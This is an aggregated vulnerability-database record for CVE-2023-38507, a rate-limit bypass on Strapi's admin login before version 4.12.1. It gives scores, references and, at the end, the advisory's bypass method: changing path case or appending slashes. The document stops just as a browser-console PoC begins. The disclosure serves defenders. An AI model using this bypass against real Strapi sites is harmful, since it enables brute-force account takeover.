cvelistv5 - CVE-2023-38507

CVE-2023-38507 (GCVE-0-2023-38507)

Vulnerability from cvelistv5 – Published: 2023-09-15 19:15 – Updated: 2024-09-25 18:05

Summary

Strapi is the an open-source headless content management system. Prior to version 4.12.1, there is a rate limit on the login function of Strapi's admin screen, but it is possible to circumvent it. Therefore, the possibility of unauthorized login by login brute force attack increases. Version 4.12.1 has a fix for this issue.

Severity ?

7.3 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

CWE

CWE-770 - Allocation of Resources Without Limits or Throttling

Assigner

GitHub_M

References

URL

Tags

	https://github.com/strapi/strapi/security/advisor…	x_refsource_CONFIRM
	https://github.com/strapi/strapi/blob/32d68f1f567…	x_refsource_MISC
	https://github.com/strapi/strapi/releases/tag/v4.12.1	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	strapi	strapi	Affected: < 4.12.1

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T17:46:55.754Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "https://github.com/strapi/strapi/security/advisories/GHSA-24q2-59hm-rh9r",
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/strapi/strapi/security/advisories/GHSA-24q2-59hm-rh9r"
          },
          {
            "name": "https://github.com/strapi/strapi/blob/32d68f1f5677ed9a9a505b718c182c0a3f885426/packages/core/admin/server/middlewares/rateLimit.js#L31",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/strapi/strapi/blob/32d68f1f5677ed9a9a505b718c182c0a3f885426/packages/core/admin/server/middlewares/rateLimit.js#L31"
          },
          {
            "name": "https://github.com/strapi/strapi/releases/tag/v4.12.1",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/strapi/strapi/releases/tag/v4.12.1"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2023-38507",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-25T18:05:45.725783Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-25T18:05:58.465Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "strapi",
          "vendor": "strapi",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 4.12.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Strapi is the an open-source headless content management system. Prior to version 4.12.1, there is a rate limit on the login function of Strapi\u0027s admin screen, but it is possible to circumvent it. Therefore, the possibility of unauthorized login by login brute force attack increases. Version 4.12.1 has a fix for this issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-770",
              "description": "CWE-770: Allocation of Resources Without Limits or Throttling",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-09-15T19:15:06.391Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/strapi/strapi/security/advisories/GHSA-24q2-59hm-rh9r",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/strapi/strapi/security/advisories/GHSA-24q2-59hm-rh9r"
        },
        {
          "name": "https://github.com/strapi/strapi/blob/32d68f1f5677ed9a9a505b718c182c0a3f885426/packages/core/admin/server/middlewares/rateLimit.js#L31",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/strapi/strapi/blob/32d68f1f5677ed9a9a505b718c182c0a3f885426/packages/core/admin/server/middlewares/rateLimit.js#L31"
        },
        {
          "name": "https://github.com/strapi/strapi/releases/tag/v4.12.1",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/strapi/strapi/releases/tag/v4.12.1"
        }
      ],
      "source": {
        "advisory": "GHSA-24q2-59hm-rh9r",
        "discovery": "UNKNOWN"
      },
      "title": "Strapi Improper Rate Limiting vulnerability"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2023-38507",
    "datePublished": "2023-09-15T19:15:06.391Z",
    "dateReserved": "2023-07-18T16:28:12.078Z",
    "dateUpdated": "2024-09-25T18:05:58.465Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "fkie_nvd": {
      "configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:*\", \"versionEndExcluding\": \"4.12.1\", \"matchCriteriaId\": \"F8A80799-A87E-41E1-9D7B-9F27E85A29BD\"}]}]}]",
      "descriptions": "[{\"lang\": \"en\", \"value\": \"Strapi is the an open-source headless content management system. Prior to version 4.12.1, there is a rate limit on the login function of Strapi\u0027s admin screen, but it is possible to circumvent it. Therefore, the possibility of unauthorized login by login brute force attack increases. Version 4.12.1 has a fix for this issue.\"}, {\"lang\": \"es\", \"value\": \"Strapi es un sistema de gesti\\u00f3n de contenidos headless de c\\u00f3digo abierto. Antes de la versi\\u00f3n 4.12.1, hab\\u00eda un l\\u00edmite de velocidad en la funci\\u00f3n de inicio de sesi\\u00f3n de la pantalla de administraci\\u00f3n de Strapi, pero es posible evitarlo. Por lo tanto, aumenta la posibilidad de un inicio de sesi\\u00f3n no autorizado mediante un ataque de fuerza bruta. La versi\\u00f3n 4.12.1 tiene una soluci\\u00f3n para este problema.\"}]",
      "id": "CVE-2023-38507",
      "lastModified": "2024-11-21T08:13:43.200",
      "metrics": "{\"cvssMetricV31\": [{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\", \"baseScore\": 7.3, \"baseSeverity\": \"HIGH\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"LOW\", \"integrityImpact\": \"LOW\", \"availabilityImpact\": \"LOW\"}, \"exploitabilityScore\": 3.9, \"impactScore\": 3.4}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"baseScore\": 9.8, \"baseSeverity\": \"CRITICAL\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 3.9, \"impactScore\": 5.9}]}",
      "published": "2023-09-15T20:15:08.997",
      "references": "[{\"url\": \"https://github.com/strapi/strapi/blob/32d68f1f5677ed9a9a505b718c182c0a3f885426/packages/core/admin/server/middlewares/rateLimit.js#L31\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Issue Tracking\"]}, {\"url\": \"https://github.com/strapi/strapi/releases/tag/v4.12.1\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Release Notes\"]}, {\"url\": \"https://github.com/strapi/strapi/security/advisories/GHSA-24q2-59hm-rh9r\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Exploit\", \"Third Party Advisory\"]}, {\"url\": \"https://github.com/strapi/strapi/blob/32d68f1f5677ed9a9a505b718c182c0a3f885426/packages/core/admin/server/middlewares/rateLimit.js#L31\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Issue Tracking\"]}, {\"url\": \"https://github.com/strapi/strapi/releases/tag/v4.12.1\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Release Notes\"]}, {\"url\": \"https://github.com/strapi/strapi/security/advisories/GHSA-24q2-59hm-rh9r\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\", \"Third Party Advisory\"]}]",
      "sourceIdentifier": "security-advisories@github.com",
      "vulnStatus": "Modified",
      "weaknesses": "[{\"source\": \"security-advisories@github.com\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-770\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2023-38507\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2023-09-15T20:15:08.997\",\"lastModified\":\"2024-11-21T08:13:43.200\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Strapi is the an open-source headless content management system. Prior to version 4.12.1, there is a rate limit on the login function of Strapi\u0027s admin screen, but it is possible to circumvent it. Therefore, the possibility of unauthorized login by login brute force attack increases. Version 4.12.1 has a fix for this issue.\"},{\"lang\":\"es\",\"value\":\"Strapi es un sistema de gesti\u00f3n de contenidos headless de c\u00f3digo abierto. Antes de la versi\u00f3n 4.12.1, hab\u00eda un l\u00edmite de velocidad en la funci\u00f3n de inicio de sesi\u00f3n de la pantalla de administraci\u00f3n de Strapi, pero es posible evitarlo. Por lo tanto, aumenta la posibilidad de un inicio de sesi\u00f3n no autorizado mediante un ataque de fuerza bruta. La versi\u00f3n 4.12.1 tiene una soluci\u00f3n para este problema.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\",\"baseScore\":7.3,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":3.9,\"impactScore\":3.4},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-770\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"4.12.1\",\"matchCriteriaId\":\"F8A80799-A87E-41E1-9D7B-9F27E85A29BD\"}]}]}],\"references\":[{\"url\":\"https://github.com/strapi/strapi/blob/32d68f1f5677ed9a9a505b718c182c0a3f885426/packages/core/admin/server/middlewares/rateLimit.js#L31\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Issue Tracking\"]},{\"url\":\"https://github.com/strapi/strapi/releases/tag/v4.12.1\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/strapi/strapi/security/advisories/GHSA-24q2-59hm-rh9r\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/strapi/strapi/blob/32d68f1f5677ed9a9a505b718c182c0a3f885426/packages/core/admin/server/middlewares/rateLimit.js#L31\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Issue Tracking\"]},{\"url\":\"https://github.com/strapi/strapi/releases/tag/v4.12.1\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/strapi/strapi/security/advisories/GHSA-24q2-59hm-rh9r\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://github.com/strapi/strapi/security/advisories/GHSA-24q2-59hm-rh9r\", \"name\": \"https://github.com/strapi/strapi/security/advisories/GHSA-24q2-59hm-rh9r\", \"tags\": [\"x_refsource_CONFIRM\", \"x_transferred\"]}, {\"url\": \"https://github.com/strapi/strapi/blob/32d68f1f5677ed9a9a505b718c182c0a3f885426/packages/core/admin/server/middlewares/rateLimit.js#L31\", \"name\": \"https://github.com/strapi/strapi/blob/32d68f1f5677ed9a9a505b718c182c0a3f885426/packages/core/admin/server/middlewares/rateLimit.js#L31\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/strapi/strapi/releases/tag/v4.12.1\", \"name\": \"https://github.com/strapi/strapi/releases/tag/v4.12.1\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-02T17:46:55.754Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2023-38507\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-09-25T18:05:45.725783Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-09-25T18:05:52.828Z\"}}], \"cna\": {\"title\": \"Strapi Improper Rate Limiting vulnerability\", \"source\": {\"advisory\": \"GHSA-24q2-59hm-rh9r\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"LOW\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"strapi\", \"product\": \"strapi\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 4.12.1\"}]}], \"references\": [{\"url\": \"https://github.com/strapi/strapi/security/advisories/GHSA-24q2-59hm-rh9r\", \"name\": \"https://github.com/strapi/strapi/security/advisories/GHSA-24q2-59hm-rh9r\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/strapi/strapi/blob/32d68f1f5677ed9a9a505b718c182c0a3f885426/packages/core/admin/server/middlewares/rateLimit.js#L31\", \"name\": \"https://github.com/strapi/strapi/blob/32d68f1f5677ed9a9a505b718c182c0a3f885426/packages/core/admin/server/middlewares/rateLimit.js#L31\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/strapi/strapi/releases/tag/v4.12.1\", \"name\": \"https://github.com/strapi/strapi/releases/tag/v4.12.1\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Strapi is the an open-source headless content management system. Prior to version 4.12.1, there is a rate limit on the login function of Strapi\u0027s admin screen, but it is possible to circumvent it. Therefore, the possibility of unauthorized login by login brute force attack increases. Version 4.12.1 has a fix for this issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-770\", \"description\": \"CWE-770: Allocation of Resources Without Limits or Throttling\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2023-09-15T19:15:06.391Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2023-38507\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2024-09-25T18:05:58.465Z\", \"dateReserved\": \"2023-07-18T16:28:12.078Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2023-09-15T19:15:06.391Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

GSD-2023-38507

Vulnerability from gsd - Updated: 2023-12-13 01:20

Details

Aliases

CVE-2023-38507

Aliases

CVE-2023-38507

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2023-38507",
    "id": "GSD-2023-38507"
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2023-38507"
      ],
      "details": "Strapi is the an open-source headless content management system. Prior to version 4.12.1, there is a rate limit on the login function of Strapi\u0027s admin screen, but it is possible to circumvent it. Therefore, the possibility of unauthorized login by login brute force attack increases. Version 4.12.1 has a fix for this issue.",
      "id": "GSD-2023-38507",
      "modified": "2023-12-13T01:20:36.020601Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "security-advisories@github.com",
        "ID": "CVE-2023-38507",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "strapi",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "=",
                          "version_value": "\u003c 4.12.1"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "strapi"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "Strapi is the an open-source headless content management system. Prior to version 4.12.1, there is a rate limit on the login function of Strapi\u0027s admin screen, but it is possible to circumvent it. Therefore, the possibility of unauthorized login by login brute force attack increases. Version 4.12.1 has a fix for this issue."
          }
        ]
      },
      "impact": {
        "cvss": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.1"
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "cweId": "CWE-770",
                "lang": "eng",
                "value": "CWE-770: Allocation of Resources Without Limits or Throttling"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://github.com/strapi/strapi/security/advisories/GHSA-24q2-59hm-rh9r",
            "refsource": "MISC",
            "url": "https://github.com/strapi/strapi/security/advisories/GHSA-24q2-59hm-rh9r"
          },
          {
            "name": "https://github.com/strapi/strapi/blob/32d68f1f5677ed9a9a505b718c182c0a3f885426/packages/core/admin/server/middlewares/rateLimit.js#L31",
            "refsource": "MISC",
            "url": "https://github.com/strapi/strapi/blob/32d68f1f5677ed9a9a505b718c182c0a3f885426/packages/core/admin/server/middlewares/rateLimit.js#L31"
          },
          {
            "name": "https://github.com/strapi/strapi/releases/tag/v4.12.1",
            "refsource": "MISC",
            "url": "https://github.com/strapi/strapi/releases/tag/v4.12.1"
          }
        ]
      },
      "source": {
        "advisory": "GHSA-24q2-59hm-rh9r",
        "discovery": "UNKNOWN"
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.12.1",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "security-advisories@github.com",
          "ID": "CVE-2023-38507"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "Strapi is the an open-source headless content management system. Prior to version 4.12.1, there is a rate limit on the login function of Strapi\u0027s admin screen, but it is possible to circumvent it. Therefore, the possibility of unauthorized login by login brute force attack increases. Version 4.12.1 has a fix for this issue."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-770"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://github.com/strapi/strapi/blob/32d68f1f5677ed9a9a505b718c182c0a3f885426/packages/core/admin/server/middlewares/rateLimit.js#L31",
              "refsource": "MISC",
              "tags": [
                "Issue Tracking"
              ],
              "url": "https://github.com/strapi/strapi/blob/32d68f1f5677ed9a9a505b718c182c0a3f885426/packages/core/admin/server/middlewares/rateLimit.js#L31"
            },
            {
              "name": "https://github.com/strapi/strapi/security/advisories/GHSA-24q2-59hm-rh9r",
              "refsource": "MISC",
              "tags": [
                "Exploit",
                "Third Party Advisory"
              ],
              "url": "https://github.com/strapi/strapi/security/advisories/GHSA-24q2-59hm-rh9r"
            },
            {
              "name": "https://github.com/strapi/strapi/releases/tag/v4.12.1",
              "refsource": "MISC",
              "tags": [
                "Release Notes"
              ],
              "url": "https://github.com/strapi/strapi/releases/tag/v4.12.1"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      },
      "lastModifiedDate": "2023-09-21T14:09Z",
      "publishedDate": "2023-09-15T20:15Z"
    }
  }
}

FKIE_CVE-2023-38507

Vulnerability from fkie_nvd - Published: 2023-09-15 20:15 - Updated: 2024-11-21 08:13

Severity ?

7.3 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/strapi/strapi/blob/32d68f1f5677ed9a9a505b718c182c0a3f885426/packages/core/admin/server/middlewares/rateLimit.js#L31	Issue Tracking
security-advisories@github.com	https://github.com/strapi/strapi/releases/tag/v4.12.1	Release Notes
security-advisories@github.com	https://github.com/strapi/strapi/security/advisories/GHSA-24q2-59hm-rh9r	Exploit, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/strapi/strapi/blob/32d68f1f5677ed9a9a505b718c182c0a3f885426/packages/core/admin/server/middlewares/rateLimit.js#L31	Issue Tracking
af854a3a-2127-422b-91ae-364da2661108	https://github.com/strapi/strapi/releases/tag/v4.12.1	Release Notes
af854a3a-2127-422b-91ae-364da2661108	https://github.com/strapi/strapi/security/advisories/GHSA-24q2-59hm-rh9r	Exploit, Third Party Advisory

Impacted products

	Vendor	Product	Version
	strapi	strapi	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "F8A80799-A87E-41E1-9D7B-9F27E85A29BD",
              "versionEndExcluding": "4.12.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Strapi is the an open-source headless content management system. Prior to version 4.12.1, there is a rate limit on the login function of Strapi\u0027s admin screen, but it is possible to circumvent it. Therefore, the possibility of unauthorized login by login brute force attack increases. Version 4.12.1 has a fix for this issue."
    },
    {
      "lang": "es",
      "value": "Strapi es un sistema de gesti\u00f3n de contenidos headless de c\u00f3digo abierto. Antes de la versi\u00f3n 4.12.1, hab\u00eda un l\u00edmite de velocidad en la funci\u00f3n de inicio de sesi\u00f3n de la pantalla de administraci\u00f3n de Strapi, pero es posible evitarlo. Por lo tanto, aumenta la posibilidad de un inicio de sesi\u00f3n no autorizado mediante un ataque de fuerza bruta. La versi\u00f3n 4.12.1 tiene una soluci\u00f3n para este problema."
    }
  ],
  "id": "CVE-2023-38507",
  "lastModified": "2024-11-21T08:13:43.200",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "LOW",
          "baseScore": 7.3,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.4,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2023-09-15T20:15:08.997",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Issue Tracking"
      ],
      "url": "https://github.com/strapi/strapi/blob/32d68f1f5677ed9a9a505b718c182c0a3f885426/packages/core/admin/server/middlewares/rateLimit.js#L31"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Release Notes"
      ],
      "url": "https://github.com/strapi/strapi/releases/tag/v4.12.1"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://github.com/strapi/strapi/security/advisories/GHSA-24q2-59hm-rh9r"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Issue Tracking"
      ],
      "url": "https://github.com/strapi/strapi/blob/32d68f1f5677ed9a9a505b718c182c0a3f885426/packages/core/admin/server/middlewares/rateLimit.js#L31"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Release Notes"
      ],
      "url": "https://github.com/strapi/strapi/releases/tag/v4.12.1"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://github.com/strapi/strapi/security/advisories/GHSA-24q2-59hm-rh9r"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-770"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-24Q2-59HM-RH9R

Vulnerability from github – Published: 2023-09-13 16:32 – Updated: 2023-09-13 16:32

Summary

Strapi Improper Rate Limiting vulnerability

Details

1. Summary

There is a rate limit on the login function of Strapi's admin screen, but it is possible to circumvent it.

2. Details

It is possible to avoid this by modifying the rate-limited request path as follows. 1. Manipulating request paths to upper or lower case. (Pattern 1) - In this case, avoidance is possible with various patterns. 2. Add path slashes to the end of the request path. (Pattern 2)

3. PoC

Access the administrator's login screen (/admin/auth/login) and execute the following PoC on the browser's console screen.

Pattern 1 (uppercase and lowercase)

// poc.js
(async () => {
